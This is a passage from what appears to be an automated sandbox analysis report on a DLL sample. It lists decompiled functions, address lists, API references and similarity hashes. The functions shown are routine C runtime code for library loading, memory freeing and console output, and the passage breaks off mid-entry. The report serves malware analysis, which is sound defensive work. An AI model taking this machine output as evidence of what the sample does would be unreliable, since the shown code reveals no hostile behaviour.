Uniqueness

Uniqueness Score: -1.00%

Function 6EDA8258, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA8258(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6edc4158 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6edaef08 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6EDA61C3(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6EDA61C3(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x6eda8261
0x6eda830b
0x6eda8269
0x6eda826b
0x6eda8272
0x6eda8274
0x6eda827a
0x6eda8287
0x6eda829c
0x6eda82a0
0x6eda82f2
0x6eda82f2
0x6eda82f7
0x6eda82fb
0x6eda82fe
0x6eda82fe
0x6eda8304
0x6eda8306
0x6eda831d
0x6eda8316
0x6eda831c
0x6eda831c
0x6eda8308
0x6eda8308
0x00000000
0x6eda8308
0x6eda82a2
0x6eda82ab
0x6eda82e2
0x6eda82e2
0x6eda82e4
0x6eda82e6
0x00000000
0x00000000
0x6eda82ee
0x00000000
0x6eda82ee
0x6eda82b5
0x6eda82ba
0x6eda82bf
0x00000000
0x00000000
0x6eda82c9
0x6eda82ce
0x6eda82d3
0x00000000
0x00000000
0x6eda82d8
0x6eda82de
0x00000000
0x6eda82de
0x6eda827f
0x00000000
0x00000000
0x00000000
0x6eda8285
0x6eda8314
0x00000000

Strings

api-ms-, xrefs: 6EDA82AF
ext-ms-, xrefs: 6EDA82C3

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: e375af1407d5bcb2bbb884288d9eafdf02b491522527148fcde59e2ef8fea94c
Instruction ID: 1c09d5c04ab5e7505b0c5d6e8ad3c0d029158ad466de4312c68259c7878ec05d
Opcode Fuzzy Hash: e375af1407d5bcb2bbb884288d9eafdf02b491522527148fcde59e2ef8fea94c
Instruction Fuzzy Hash: D221C335A45AA1EBDB518BEDCD88A5E3B68EB03760B110211EF55A7284D730EF01C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 6EDAB2C8, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDAB2C8(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6EDAB290(_t45, 7);
					E6EDAB290(_t45 + 0x1c, 7);
					E6EDAB290(_t45 + 0x38, 0xc);
					E6EDAB290(_t45 + 0x68, 0xc);
					E6EDAB290(_t45 + 0x98, 2);
					E6EDA6B43( *((intOrPtr*)(_t45 + 0xa0)));
					E6EDA6B43( *((intOrPtr*)(_t45 + 0xa4)));
					E6EDA6B43( *((intOrPtr*)(_t45 + 0xa8)));
					E6EDAB290(_t45 + 0xb4, 7);
					E6EDAB290(_t45 + 0xd0, 7);
					E6EDAB290(_t45 + 0xec, 0xc);
					E6EDAB290(_t45 + 0x11c, 0xc);
					E6EDAB290(_t45 + 0x14c, 2);
					E6EDA6B43( *((intOrPtr*)(_t45 + 0x154)));
					E6EDA6B43( *((intOrPtr*)(_t45 + 0x158)));
					E6EDA6B43( *((intOrPtr*)(_t45 + 0x15c)));
					return E6EDA6B43( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6edab2ce
0x6edab2d3
0x6edab2dc
0x6edab2e7
0x6edab2f2
0x6edab2fd
0x6edab30b
0x6edab316
0x6edab321
0x6edab32c
0x6edab33a
0x6edab348
0x6edab359
0x6edab367
0x6edab375
0x6edab380
0x6edab38b
0x6edab396
0x00000000
0x6edab3a6
0x6edab3ab

APIs

Part of subcall function 6EDAB290: _free.LIBCMT ref: 6EDAB2B5

_free.LIBCMT ref: 6EDAB316

Part of subcall function 6EDA6B43: HeapFree.KERNEL32(00000000,00000000,?,6EDA5D93), ref: 6EDA6B59
Part of subcall function 6EDA6B43: GetLastError.KERNEL32(?,?,6EDA5D93), ref: 6EDA6B6B

_free.LIBCMT ref: 6EDAB321
_free.LIBCMT ref: 6EDAB32C
_free.LIBCMT ref: 6EDAB380
_free.LIBCMT ref: 6EDAB38B
_free.LIBCMT ref: 6EDAB396
_free.LIBCMT ref: 6EDAB3A1

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5efe60baf44d8ba1c93d5764bc9e0069d11d7209c685432ebbda561d8b9dfbd0
Instruction ID: 0fbea92276f82ae511b53329233c3dd71db4e8014744cb88032081567fbcfd61
Opcode Fuzzy Hash: 5efe60baf44d8ba1c93d5764bc9e0069d11d7209c685432ebbda561d8b9dfbd0
Instruction Fuzzy Hash: A511C472960B0CAAD660ABF9CD09FCFB79DAB04704F444C16A3ADA6094DB65E7058760

Uniqueness

Uniqueness Score: -1.00%

Function 6EDAA3DB, Relevance: 9.3, APIs: 6, Instructions: 319
fileCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E6EDAA3DB(void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed char _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed char _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				signed char _t235;
				signed int _t244;
				intOrPtr _t247;
				signed char _t250;
				signed int _t251;
				signed char _t253;
				struct _OVERLAPPED* _t254;
				intOrPtr _t256;
				void* _t260;
				signed char _t261;
				void* _t262;
				void* _t264;
				long _t266;
				signed int _t269;
				long _t270;
				struct _OVERLAPPED* _t271;
				signed int _t272;
				intOrPtr _t274;
				signed int _t276;
				signed int _t279;
				long _t280;
				long _t281;
				signed char _t282;
				intOrPtr _t283;
				signed int _t284;
				void* _t285;
				void* _t286;

				_t172 =  *0x6edc3004; // 0x8da52076
				_v8 = _t172 ^ _t284;
				_t174 = _a8;
				_t261 = _a12;
				_t272 = (_t174 & 0x0000003f) * 0x38;
				_t244 = _t174 >> 6;
				_v112 = _t261;
				_v84 = _t244;
				_v80 = _t272;
				_t274 = _a16 + _t261;
				_v116 =  *((intOrPtr*)(_t272 +  *((intOrPtr*)(0x6edc3f50 + _t244 * 4)) + 0x18));
				_v104 = _t274;
				_t178 = GetConsoleCP();
				_t242 = 0;
				_v124 = _t178;
				E6EDA608C( &_v72, _t261, 0);
				asm("stosd");
				_t247 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t247;
				asm("stosd");
				asm("stosd");
				_t266 = _v112;
				_v40 = _t266;
				if(_t266 >= _t274) {
					L52:
					__eflags = _v60 - _t242;
				} else {
					_t276 = _v92;
					while(1) {
						_v47 =  *_t266;
						_v76 = _t242;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x6edc3f50 + _v84 * 4));
						_v52 = _t186;
						if(_t247 != 0xfde9) {
							goto L23;
						}
						_t261 = _v80;
						_t212 = _t186 + 0x2e + _t261;
						_t254 = _t242;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t254)) != _t242) {
							_t254 =  &(_t254->Internal);
							if(_t254 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t269 = _v104 - _t213;
						_v44 = _t254;
						if(_t254 <= 0) {
							_t256 =  *((char*)(( *_t213 & 0x000000ff) + 0x6edc3750)) + 1;
							_v52 = _t256;
							__eflags = _t256 - _t269;
							if(_t256 > _t269) {
								__eflags = _t269;
								if(_t269 <= 0) {
									goto L44;
								} else {
									_t280 = _v40;
									do {
										_t262 = _t242 + _t261;
										_t216 =  *((intOrPtr*)(_t242 + _t280));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 +  *((intOrPtr*)(0x6edc3f50 + _v84 * 4)) + 0x2e)) = _t216;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									goto L43;
								}
							} else {
								_t270 = _v40;
								__eflags = _t256 - 4;
								_v144 = _t242;
								_t258 =  &_v144;
								_v140 = _t242;
								_v56 = _t270;
								_t219 = (0 | _t256 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t261 + _v52 + 0x2e) & 0x000000ff) + 0x6edc3750)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t254;
							_v52 = _t229;
							if(_t229 > _t269) {
								__eflags = _t269;
								if(_t269 > 0) {
									_t281 = _v40;
									do {
										_t264 = _t242 + _t261 + _t254;
										_t231 =  *((intOrPtr*)(_t242 + _t281));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t264 +  *((intOrPtr*)(0x6edc3f50 + _v84 * 4)) + 0x2e)) = _t231;
										_t254 = _v44;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									L43:
									_t276 = _v92;
								}
								L44:
								_t279 = _t276 + _t269;
								__eflags = _t279;
								L45:
								__eflags = _v60;
								_v92 = _t279;
							} else {
								_t261 = _t242;
								if(_t254 > 0) {
									_t283 = _v108;
									do {
										 *((char*)(_t284 + _t261 - 0xc)) =  *((intOrPtr*)(_t283 + _t261));
										_t261 = _t261 + 1;
									} while (_t261 < _t254);
									_t229 = _v52;
								}
								_t270 = _v40;
								if(_t229 > 0) {
									E6EDA4B70( &_v16 + _t254, _t270, _v52);
									_t254 = _v44;
									_t285 = _t285 + 0xc;
								}
								if(_t254 > 0) {
									_t261 = _v44;
									_t271 = _t242;
									_t282 = _v80;
									do {
										_t260 = _t271 + _t282;
										_t271 =  &(_t271->Internal);
										 *(_t260 +  *((intOrPtr*)(0x6edc3f50 + _v84 * 4)) + 0x2e) = _t242;
									} while (_t271 < _t261);
									_t270 = _v40;
								}
								_v136 = _t242;
								_v120 =  &_v16;
								_t258 =  &_v136;
								_v132 = _t242;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E6EDAB00D(_t258);
								_t286 = _t285 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t266 = _t270 + _v52 - 1;
									L31:
									_t266 = _t266 + 1;
									_v40 = _t266;
									_t193 = E6EDA7E45(_v124, _t242,  &_v76, _v44,  &_v32, 5, _t242, _t242);
									_t285 = _t286 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t242) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t276 = _v88 - _v112 + _t266;
											_v92 = _t276;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t266 >= _v104) {
														goto L52;
													} else {
														_t247 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t242) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t276 = _t276 + 1;
															_v92 = _t276;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t250 = _v80;
						_t261 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
						__eflags = _t261 & 0x00000004;
						if((_t261 & 0x00000004) == 0) {
							_v33 =  *_t266;
							_t188 = E6EDA9154(_t261);
							_t251 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
								_push(1);
								_push(_t266);
								goto L30;
							} else {
								_t202 = _t266 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t261 = _v84;
									_t253 = _v80;
									_t242 = _v33;
									 *((char*)(_t253 +  *((intOrPtr*)(0x6edc3f50 + _t261 * 4)) + 0x2e)) = _v33;
									 *(_t253 +  *((intOrPtr*)(0x6edc3f50 + _t261 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x6edc3f50 + _t261 * 4)) + 0x2d) | 0x00000004;
									_t279 = _t276 + 1;
									goto L45;
								} else {
									_t206 = E6EDA9021( &_v76, _t266, 2);
									_t286 = _t285 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t266 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_t261 = _t261 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
							_v23 =  *_t266;
							_push(2);
							 *(_t250 + _v52 + 0x2d) = _t261;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E6EDA9021();
							_t286 = _t285 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t284;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6EDA3753(_a4, _t242, _v8 ^ _t284, _t261, _a4,  &_v96);
			}

0x6edaa3e6
0x6edaa3ed
0x6edaa3f0
0x6edaa3f5
0x6edaa3fd
0x6edaa400
0x6edaa404
0x6edaa407
0x6edaa411
0x6edaa41b
0x6edaa41d
0x6edaa420
0x6edaa423
0x6edaa429
0x6edaa42b
0x6edaa432
0x6edaa43f
0x6edaa440
0x6edaa443
0x6edaa446
0x6edaa447
0x6edaa448
0x6edaa44b
0x6edaa450
0x6edaa75c
0x6edaa75c
0x6edaa456
0x6edaa456
0x6edaa459
0x6edaa45b
0x6edaa461
0x6edaa464
0x6edaa46b
0x6edaa472
0x6edaa47b
0x00000000
0x00000000
0x6edaa481
0x6edaa487
0x6edaa489
0x6edaa48b
0x6edaa48e
0x6edaa493
0x6edaa497
0x00000000
0x00000000
0x00000000
0x6edaa497
0x6edaa49c
0x6edaa49f
0x6edaa4a1
0x6edaa4a6
0x6edaa558
0x6edaa559
0x6edaa55c
0x6edaa55e
0x6edaa70c
0x6edaa70e
0x00000000
0x6edaa710
0x6edaa710
0x6edaa713
0x6edaa716
0x6edaa71f
0x6edaa722
0x6edaa723
0x6edaa727
0x6edaa72a
0x6edaa72a
0x00000000
0x6edaa72e
0x6edaa564
0x6edaa564
0x6edaa569
0x6edaa56c
0x6edaa572
0x6edaa578
0x6edaa581
0x6edaa584
0x6edaa584
0x6edaa585
0x6edaa586
0x6edaa589
0x6edaa58a
0x00000000
0x6edaa58a
0x6edaa4ac
0x6edaa4bb
0x6edaa4bc
0x6edaa4bf
0x6edaa4c1
0x6edaa4c6
0x6edaa6d7
0x6edaa6d9
0x6edaa6db
0x6edaa6de
0x6edaa6e3
0x6edaa6ec
0x6edaa6ef
0x6edaa6f0
0x6edaa6f4
0x6edaa6f7
0x6edaa6fa
0x6edaa6fa
0x6edaa6fe
0x6edaa6fe
0x6edaa6fe
0x6edaa701
0x6edaa701
0x6edaa701
0x6edaa703
0x6edaa703
0x6edaa707
0x6edaa4cc
0x6edaa4cc
0x6edaa4d0
0x6edaa4d2
0x6edaa4d5
0x6edaa4d8
0x6edaa4dc
0x6edaa4dd
0x6edaa4e1
0x6edaa4e1
0x6edaa4e4
0x6edaa4e9
0x6edaa4f5
0x6edaa4fa
0x6edaa4fd
0x6edaa4fd
0x6edaa502
0x6edaa504
0x6edaa507
0x6edaa509
0x6edaa50c
0x6edaa50f
0x6edaa512
0x6edaa51a
0x6edaa51e
0x6edaa522
0x6edaa522
0x6edaa528
0x6edaa52e
0x6edaa531
0x6edaa539
0x6edaa540
0x6edaa544
0x6edaa545
0x6edaa548
0x6edaa549
0x6edaa58d
0x6edaa58d
0x6edaa591
0x6edaa592
0x6edaa597
0x6edaa59d
0x00000000
0x6edaa5a3
0x6edaa5a7
0x6edaa630
0x6edaa637
0x6edaa63f
0x6edaa647
0x6edaa64c
0x6edaa64f
0x6edaa654
0x00000000
0x6edaa65a
0x6edaa66f
0x6edaa753
0x6edaa759
0x00000000
0x6edaa675
0x6edaa67e
0x6edaa680
0x6edaa686
0x00000000
0x6edaa68c
0x6edaa690
0x6edaa6c6
0x6edaa6c9
0x00000000
0x6edaa6cf
0x6edaa6cf
0x00000000
0x6edaa6cf
0x6edaa692
0x6edaa694
0x6edaa696
0x6edaa6af
0x00000000
0x6edaa6b5
0x6edaa6b9
0x00000000
0x6edaa6bf
0x6edaa6bf
0x6edaa6c2
0x6edaa6c3
0x00000000
0x6edaa6c3
0x6edaa6b9
0x6edaa6af
0x6edaa690
0x6edaa686
0x6edaa66f
0x6edaa654
0x6edaa59d
0x6edaa4c6
0x00000000
0x6edaa5ae
0x6edaa5ae
0x6edaa5b1
0x6edaa5b5
0x6edaa5b8
0x6edaa5da
0x6edaa5dd
0x6edaa5e2
0x6edaa5e6
0x6edaa5ea
0x6edaa618
0x6edaa61a
0x00000000
0x6edaa5ec
0x6edaa5ec
0x6edaa5ef
0x6edaa5f2
0x6edaa5f5
0x6edaa730
0x6edaa733
0x6edaa736
0x6edaa740
0x6edaa74b
0x6edaa750
0x00000000
0x6edaa5fb
0x6edaa602
0x6edaa607
0x6edaa60a
0x6edaa60d
0x00000000
0x6edaa613
0x6edaa613
0x00000000
0x6edaa613
0x6edaa60d
0x6edaa5f5
0x6edaa5ba
0x6edaa5be
0x6edaa5c1
0x6edaa5c6
0x6edaa5cc
0x6edaa5ce
0x6edaa5d5
0x6edaa61b
0x6edaa61e
0x6edaa61f
0x6edaa624
0x6edaa627
0x6edaa62a
0x00000000
0x00000000
0x00000000
0x00000000
0x6edaa62a
0x00000000
0x6edaa5b8
0x6edaa459
0x6edaa75f
0x6edaa75f
0x6edaa761
0x6edaa764
0x6edaa764
0x6edaa764
0x6edaa764
0x6edaa776
0x6edaa778
0x6edaa779
0x6edaa77a
0x6edaa786

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6EDAA423
__fassign.LIBCMT ref: 6EDAA602
__fassign.LIBCMT ref: 6EDAA61F
WriteFile.KERNEL32(?,6EDA8BCE,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EDAA667
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6EDAA6A7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EDAA753

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: a49494ff93f7357a8a859620b0a17f02b1f988967506156c4f241cf081a3d189
Instruction ID: 860fcf09e23edb023c94acc100a0919c9808c03de58f1e3a54159bedad078ace
Opcode Fuzzy Hash: a49494ff93f7357a8a859620b0a17f02b1f988967506156c4f241cf081a3d189
Instruction Fuzzy Hash: 41D1AE75D002599FDF11CFE8C8809EDBBB5AF49314F240259E959BB241E731AA46CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA49E7, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EDA49E7(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6edc3020 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6EDA523D(_t13, __eflags,  *0x6edc3020);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6EDA5278(_t14, __eflags,  *0x6edc3020, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6EDA61B8();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6EDA5278(_t18, __eflags,  *0x6edc3020, 0);
								} else {
									_t8 = E6EDA5278(_t18, __eflags,  *0x6edc3020, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6EDA5FD1(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x6eda49e7
0x6eda49ee
0x6eda4a01
0x6eda4a08
0x6eda4a0a
0x6eda4a0b
0x6eda4a0e
0x6eda4a27
0x6eda4a27
0x6eda4a10
0x6eda4a10
0x6eda4a12
0x6eda4a1c
0x6eda4a23
0x6eda4a25
0x6eda4a2c
0x6eda4a35
0x6eda4a38
0x6eda4a39
0x6eda4a3b
0x6eda4a4f
0x6eda4a4f
0x6eda4a58
0x6eda4a3d
0x6eda4a44
0x6eda4a4a
0x6eda4a4b
0x6eda4a4d
0x6eda4a61
0x6eda4a63
0x6eda4a63
0x00000000
0x00000000
0x00000000
0x6eda4a4d
0x6eda4a66
0x00000000
0x00000000
0x00000000
0x6eda4a25
0x6eda4a12
0x6eda4a6e
0x6eda4a78
0x6eda49f0
0x6eda49f2
0x6eda49f2

APIs

GetLastError.KERNEL32(00000001,?,6EDA4555,6EDA3D73,6EDA378C,?,6EDA39C4,?,00000001,?,?,00000001,?,6EDC1420,0000000C,6EDA3ABD), ref: 6EDA49F5
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6EDA4A03
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6EDA4A1C
SetLastError.KERNEL32(00000000,6EDA39C4,?,00000001,?,?,00000001,?,6EDC1420,0000000C,6EDA3ABD,?,00000001,?), ref: 6EDA4A6E

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2972f21d875326de2a064af2ac54e53313d0175510938ed321d428256d6d0303
Instruction ID: 71f4f4b541575d2f2121e7200f4cd3d29dfe587faafbeef98b5f046f78c9067f
Opcode Fuzzy Hash: 2972f21d875326de2a064af2ac54e53313d0175510938ed321d428256d6d0303
Instruction Fuzzy Hash: 2001DD335597239EBA551FFCDC4899A3A5CDB46BBD7200729E710450E0EF128A036254

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA73B9, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA73B9(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E6EDA7E45(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E6EDA7E45(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E6EDA6A9D(GetLastError());
									_t17 =  *((intOrPtr*)(E6EDA6AD3(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E6EDA7480(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6EDA6A9D(GetLastError());
						_t17 =  *((intOrPtr*)(E6EDA6AD3(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E6EDA7480(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6EDA74A7(_a8);
				return 0;
			}

0x6eda73bf
0x6eda73c4
0x6eda73d8
0x6eda73db
0x6eda740d
0x6eda7415
0x6eda7417
0x6eda7430
0x6eda7433
0x6eda7436
0x6eda7444
0x6eda7453
0x6eda745b
0x6eda745d
0x6eda7476
0x6eda7479
0x6eda7479
0x6eda745f
0x6eda7466
0x6eda7471
0x6eda7471
0x6eda747b
0x6eda747c
0x00000000
0x6eda747c
0x6eda743b
0x6eda7440
0x6eda7442
0x00000000
0x00000000
0x00000000
0x6eda7442
0x6eda7420
0x6eda742b
0x00000000
0x6eda742b
0x6eda73dd
0x6eda73e0
0x6eda73e3
0x6eda73f6
0x6eda73f9
0x6eda73fb
0x6eda73fd
0x00000000
0x6eda73fd
0x6eda73e9
0x6eda73ee
0x6eda73f0
0x00000000
0x00000000
0x00000000
0x6eda73f0
0x6eda73c9
0x00000000

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6EDA73BE

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
